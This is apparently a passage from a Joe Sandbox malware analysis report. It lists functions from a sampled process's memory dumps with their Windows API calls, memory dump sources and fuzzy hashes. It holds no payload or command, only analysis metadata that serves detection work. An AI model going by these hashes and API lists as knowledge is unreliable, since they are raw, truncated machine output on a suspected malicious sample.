                                                                                                                                                                • Opcode Fuzzy Hash: 567f1e5b8f8a06fa7f8e80d7b1a4bc2504d7d09bc6b92a201f9c9f01c73ef6a5
                                                                                                                                                                • Instruction Fuzzy Hash: 715148B1909158AADB218F28CE84FF5BBBCFB16348F1405F9D4A8C7546C3359986CB60
                                                                                                                                                                Function 6C8AA0A0 Relevance: 1.6, APIs: 1, Instructions: 122libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 190572456-0
                                                                                                                                                                • Opcode ID: 94ec6a251bb4ead2bb2610a424998cf3b3fd792ee97446078512aa0adcb0aeae
                                                                                                                                                                • Instruction ID: 287f8e0af110bfa173bde7b1f121d73df6565788965c86e4bfc13563dc37698d
                                                                                                                                                                • Opcode Fuzzy Hash: 94ec6a251bb4ead2bb2610a424998cf3b3fd792ee97446078512aa0adcb0aeae
                                                                                                                                                                • Instruction Fuzzy Hash: 295112B1A04318CFDB24DF98D94679DBBB4FB49300F00896DE819ABB60D7319949CFA5
                                                                                                                                                                Function 6C8DD6D0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetThreadStackGuarantee.KERNELBASE(?), ref: 6C8DD70B
                                                                                                                                                                  • Part of subcall function 6C8AC770: HeapFree.KERNEL32(00000000,0000000C), ref: 6C8DA128
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeGuaranteeHeapStackThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4181682901-0
                                                                                                                                                                • Opcode ID: e424b4694601d71d53092b898cd4a96addb096941e213f05812f1cfcbbff25e3
                                                                                                                                                                • Instruction ID: 7433063d714763178f13bbe7715aca5efa233b66f7d2e4e826c11674a20e2b07
                                                                                                                                                                • Opcode Fuzzy Hash: e424b4694601d71d53092b898cd4a96addb096941e213f05812f1cfcbbff25e3
                                                                                                                                                                • Instruction Fuzzy Hash: E3119EB1D002089BCB10DF98D945BEEBBB4FB09724F104529E904A7341D336A945CFA0
                                                                                                                                                                Function 6C8C7730 Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C8B1317), ref: 6C8C7779
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                • Opcode ID: 771c05b16834668e2b328fc7783f65cc2cf0e204c0ff0faee24b3234e5c7a462
                                                                                                                                                                • Instruction ID: 4e17698c618a4e56aa036c7dfb765ef1b76043439532c2348bc38d6e65bafbf9
                                                                                                                                                                • Opcode Fuzzy Hash: 771c05b16834668e2b328fc7783f65cc2cf0e204c0ff0faee24b3234e5c7a462
                                                                                                                                                                • Instruction Fuzzy Hash: 7C1134B4A093068FC304DF28D184A1ABBF1BB89714F118D6EF89997350D774EA48CF96
                                                                                                                                                                Function 6C8F87EB Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,6C8FAADE,00000001,00000364,00000000,00000002,000000FF,?,6C8F80F4,00000000,00000000), ref: 6C8F882C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: 621078856804a53d42449244d691656164400df94bb2baffeab36212288f698b
                                                                                                                                                                • Instruction ID: 2e3bb6626362190bd44874e3b8a35b4abe7df023487f84c489460d7ecdce7518
                                                                                                                                                                • Opcode Fuzzy Hash: 621078856804a53d42449244d691656164400df94bb2baffeab36212288f698b
                                                                                                                                                                • Instruction Fuzzy Hash: 9DF0BB3279613D56EB311A678A00A4B3758DB437F8B2148339C34D6990CB30D403C6E0
                                                                                                                                                                Function 6C8DC150 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00550000,?,?,?,6C8DA0EC), ref: 6C8DC165
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: 11a1d82f3c43b57c243bf21ff70cc5c64380719ebf14a73973667e65a62a56bd
                                                                                                                                                                • Instruction ID: 71fdb19accb360d071fa5953231cfd5d8aee77bdc463ba6ee3b31747b5b1e26e
                                                                                                                                                                • Opcode Fuzzy Hash: 11a1d82f3c43b57c243bf21ff70cc5c64380719ebf14a73973667e65a62a56bd
                                                                                                                                                                • Instruction Fuzzy Hash: EBD0C9B0384319AB9F04AF66E844C7B33BCBB98A147104919FC1CC3B01EB34F810CA60
                                                                                                                                                                Function 6C8C7810 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,6C8C6A1E), ref: 6C8C7826
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                • Opcode ID: d01abdbc7ea5b124026cd47f9d8767b8f610c9d8a6f08c7029efbdaac68e21ad
                                                                                                                                                                • Instruction ID: c07a10b9fb39eceeb858a2c9a9e5cfca336b559ca50e8d002d877dac83ccc2cd
                                                                                                                                                                • Opcode Fuzzy Hash: d01abdbc7ea5b124026cd47f9d8767b8f610c9d8a6f08c7029efbdaac68e21ad
                                                                                                                                                                • Instruction Fuzzy Hash: 70C002B8A482058BCB10AF24E5994657BF5BB45205FA0452AD859C3200E7389159CA82
                                                                                                                                                                Function 6C8D4C10 Relevance: 1.4, APIs: 1, Instructions: 172COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CloseHandle.KERNELBASE(?), ref: 6C8D4E4B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                • Opcode ID: 11dc6013cbdf125dd3919d475c417d5132546a7615f82942ca9f71d4ae3e6e36
                                                                                                                                                                • Instruction ID: 1fcea91eb2d1e725baaffce33d72c8ab8dd3b45cbca5f4a24e236f436d19af47
                                                                                                                                                                • Opcode Fuzzy Hash: 11dc6013cbdf125dd3919d475c417d5132546a7615f82942ca9f71d4ae3e6e36
                                                                                                                                                                • Instruction Fuzzy Hash: 1A7123B4500B449BD730CF2AC680B52BBF1BF8A718F548A2DD8DA8BA41D775F449CB91
                                                                                                                                                                Function 6C8A7F90 Relevance: 1.4, APIs: 1, Instructions: 159memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE ref: 6C8A80A7
                                                                                                                                                                  • Part of subcall function 6C8D4280: CreateWaitableTimerExW.KERNEL32(00000000,00000000,00000002,001F0003,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D42AB
                                                                                                                                                                  • Part of subcall function 6C8D4280: SetWaitableTimer.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,?,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D4311
                                                                                                                                                                  • Part of subcall function 6C8D4280: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D431E
                                                                                                                                                                  • Part of subcall function 6C8D4280: CloseHandle.KERNEL32(00000000,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D4327
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: TimerWaitable$AllocCloseCreateHandleObjectSingleVirtualWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3175046113-0
                                                                                                                                                                • Opcode ID: 4317adf3b219974f22386554eb3b29e7217757a2f954247cdd39f270cfecd91a
                                                                                                                                                                • Instruction ID: c5ab90b91103a78055d9e7f34a79234a65567d786e57c99b40ff7a3273e08516
                                                                                                                                                                • Opcode Fuzzy Hash: 4317adf3b219974f22386554eb3b29e7217757a2f954247cdd39f270cfecd91a
                                                                                                                                                                • Instruction Fuzzy Hash: CE81C2B4A00318CFCB24CFA8C985B9DBBB0BF49304F1085AAD859AB751D7759985CF91
                                                                                                                                                                Function 6C8A7530 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CloseHandle.KERNELBASE(?,6C8A699D,?,6C8A689D,?,6C8A68AD,?,6C8A68F8), ref: 6C8A753A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                • Opcode ID: bcb6064916608da32aacadb9c06009c227a934168bf8a9312e44a02bf8ff0639
                                                                                                                                                                • Instruction ID: 842f3afdd1f65ebf15d42fc3c7691e58430ae4c22e3ef0a9187310498e86bbad
                                                                                                                                                                • Opcode Fuzzy Hash: bcb6064916608da32aacadb9c06009c227a934168bf8a9312e44a02bf8ff0639
                                                                                                                                                                • Instruction Fuzzy Hash: F5B002B4648701DFCF40DF69C5889197BF4AB49351B11485CE589C7320D7349484DB15
                                                                                                                                                                Function 05096F60 Relevance: .8, Instructions: 787COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 484f85606a031168e3e872533bef776fbeec6d01a47b876ea5e5006cb4396c34
                                                                                                                                                                • Instruction ID: ad8c9e81993bd640e975c46d8262b86554810f61bf37966b04caf86f5abd9984
                                                                                                                                                                • Opcode Fuzzy Hash: 484f85606a031168e3e872533bef776fbeec6d01a47b876ea5e5006cb4396c34
                                                                                                                                                                • Instruction Fuzzy Hash: D9622134A00218CFEB15DBA4D964BEEB773EF88310F1080A9C50AAB3A4DF355E859F55
                                                                                                                                                                Function 050910E8 Relevance: .6, Instructions: 626COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 999f623e34dd46dcfd97ad9579a869ded9e97c2f753b2a270aaa4761570cde55
                                                                                                                                                                • Instruction ID: ebda88c2c4bf616f830545d78fc14a1d1e7aba5062e70d072afb8f6b97baeb44
                                                                                                                                                                • Opcode Fuzzy Hash: 999f623e34dd46dcfd97ad9579a869ded9e97c2f753b2a270aaa4761570cde55
                                                                                                                                                                • Instruction Fuzzy Hash: D7223031B1665BCBDB199B70F85B1EE7FF1F72222178446ABE402C24B9EF394442DA40
                                                                                                                                                                Function 05097CA0 Relevance: .4, Instructions: 404COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: b755d6eeced04be9aa28110a55b043ef43e6c2ea327447f7178fe48dd8c2ca26
                                                                                                                                                                • Instruction ID: cc7400472f72c8f1f42b62293ef9989b081d5c3b6b47eb09c619bc2fdbc40d82
                                                                                                                                                                • Opcode Fuzzy Hash: b755d6eeced04be9aa28110a55b043ef43e6c2ea327447f7178fe48dd8c2ca26
                                                                                                                                                                • Instruction Fuzzy Hash: 4AF12F76E006149FCB58CF68D888AADB7F2FF89310B1A8099E515AB375CB31EC41DB54
                                                                                                                                                                Function 05092E20 Relevance: .4, Instructions: 365COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: dd524b908bf52b8afa4ba580592763c878480136ab53903eea33f989eedcde3d
                                                                                                                                                                • Instruction ID: e693ebe0770c52687d0db8940ff51509f394aa446dd7d1922114c454fc4fc262
                                                                                                                                                                • Opcode Fuzzy Hash: dd524b908bf52b8afa4ba580592763c878480136ab53903eea33f989eedcde3d
                                                                                                                                                                • Instruction Fuzzy Hash: 6BE18134A00209DFDF09DBA4E554BEEBBB3FB88320F108469E406AB758DA31AD519F55
                                                                                                                                                                Function 050947B8 Relevance: .3, Instructions: 324COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: fa98a9c13a43bedb3581105b98109e8258717c882f9b001de80e98e198c4dfc9
                                                                                                                                                                • Instruction ID: a707c231f45f11973b431a4695ce889f2716829d36fad33f8bdf3c8f978be79e
                                                                                                                                                                • Opcode Fuzzy Hash: fa98a9c13a43bedb3581105b98109e8258717c882f9b001de80e98e198c4dfc9
                                                                                                                                                                • Instruction Fuzzy Hash: BFB1AA34B042518FDF299E28E858B7E7BE7BF88310F048969E406DB399DF35C8429791
                                                                                                                                                                Function 05092570 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 7b7d7479cee44146fe21b6fee7866de24dd54b5855e7ae399c1a769a686f4017
                                                                                                                                                                • Instruction ID: 8fc3a670ca86247489c2990c013fbf4c478c9bf72bc4a571c03913bb5f622ff8
                                                                                                                                                                • Opcode Fuzzy Hash: 7b7d7479cee44146fe21b6fee7866de24dd54b5855e7ae399c1a769a686f4017
                                                                                                                                                                • Instruction Fuzzy Hash: 69B15E38A51206EFDF08DB64E968B6EB7A2FF84315F508629D4129B2D8DF31DC52CB50
                                                                                                                                                                Function 05094D18 Relevance: .2, Instructions: 230COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 99712c3a8e73f711d95ad417aa32ef1a2516cf2187d94cbb22dee2ee720134d7
                                                                                                                                                                • Instruction ID: 3ac4dc2c82070fdaa27b40872a7ed93c793f216cab45553dbb4581b059b1f111
                                                                                                                                                                • Opcode Fuzzy Hash: 99712c3a8e73f711d95ad417aa32ef1a2516cf2187d94cbb22dee2ee720134d7
                                                                                                                                                                • Instruction Fuzzy Hash: C381A135B04506CFCF58CF68E498AAEB7F2BF89210B1581A9D406E7368DB31D842DB50
                                                                                                                                                                Function 05093B6F Relevance: .2, Instructions: 219COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 933dbe88ac23f73c1686d94c982550c74c2619d84e29b10e3fa77fb77050341b
                                                                                                                                                                • Instruction ID: 7fd7f7a58d594eead45d74e24746936d958b33a220bb4f70146572a54a57aa1b
                                                                                                                                                                • Opcode Fuzzy Hash: 933dbe88ac23f73c1686d94c982550c74c2619d84e29b10e3fa77fb77050341b
                                                                                                                                                                • Instruction Fuzzy Hash: 1171B930F002449BEB299B69D4587AE7AE3BFC5310F14C86DD016AB3D8CE709C458B95
                                                                                                                                                                Function 05093BA0 Relevance: .2, Instructions: 216COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c6b971e745e3c5e82606f20b9d74ae6eb91aaa09c8eb1de41557e5e8f3a50747
                                                                                                                                                                • Instruction ID: d2aa375f226d165748a963eab25d9b59240b6ff110a50e1865b4e103fa3b5966
                                                                                                                                                                • Opcode Fuzzy Hash: c6b971e745e3c5e82606f20b9d74ae6eb91aaa09c8eb1de41557e5e8f3a50747
                                                                                                                                                                • Instruction Fuzzy Hash: 1C719630F002449BEB299BB9D4587AEB6E7BFC5710F24C86DD016AB3D8CE709C458B95
                                                                                                                                                                Function 05096C20 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2e35f9aa068a791ea5fd1a1f5e5c9417a93a4df6858b431eb4a01d2388a2b5bb
